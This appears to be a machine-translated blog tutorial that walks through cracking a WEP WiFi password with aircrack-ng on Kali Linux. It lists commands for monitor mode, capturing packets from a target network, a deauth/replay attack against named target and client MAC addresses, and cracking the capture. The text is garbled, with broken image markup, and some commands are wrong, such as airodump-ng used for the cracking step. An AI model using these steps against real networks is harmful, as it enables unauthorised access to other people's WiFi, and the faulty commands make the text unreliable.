The first step is the so-called Open network card:airmon-ng wlan0 up, I test for half a day, no matter, anyway, my network card has been enabled, it doesn't matter.
The second step: turn on the listening mode airmon-ng start Wlan0, the results are as follows
650) this.width=650; "Src=" Http://s4.51cto.com/wyfs02/M00/82/07/wKiom1dH_PLynIdNAANhPOrRel4805.png-wh_500x0-wm_3 -wmp_4-s_3056392171.png "title=" GDB ' of) {OENR94) 5DT ([1oq.png "alt=" Wkiom1dh_plynidnaanhporrel4805.png-wh_50 "/>
wlan0mon, wlan0monmon, wlan0monmonmon do not know why so many, in order to prevent blindness, so simply appear a wlan0mon
step three: Airodump-ng wlan0mon probe the target host that we want to attack
650) this.width=650; "src=" Http://img1.ph.126.net/VvkWyyu3MAxSSi3HSgghnw==/2157505696587180817.png "alt=" Wireless network password crack 1: Hack WEP encrypted WiFi password-xiao106347-Learn note "/>
Main we want to see the target channel ch how much, and the first two Bssid and station two values exactly how much.
Fourth step: Airodump-ng--ivs-w longas-c 1 wlan0mon start grabbing the bag! The subcontracting file is under the current folder Longas-01.ivs
#--ivs is filtered through IVs, only the message that can break the password is reserved. ivs file, so faster;-W is the write of the captured message is named ABC and saved (then saved in the current folder as Abc-01.ivs);-C followed by the channel, such as 6.
Fifth step: Then open a new terminal window, Deauth attack the target host, to speed up the grab packet! Command format aireplay-ng-0 size-a target host Mac-c client Mac Mon0
aireplay-ng-3-B d8:24:bd:79:2a:9b-h 00:26:c7:79:9c:32 wlan0mon
Sixth step: crack password
airodump-ng longas-01.ivs -w dic.txt
This article is from the "Technical Achievement Dream" blog, please be sure to keep this source http://526869727.blog.51cto.com/2769621/1783856
Using the Aircrack-ng hack process under Kalilinux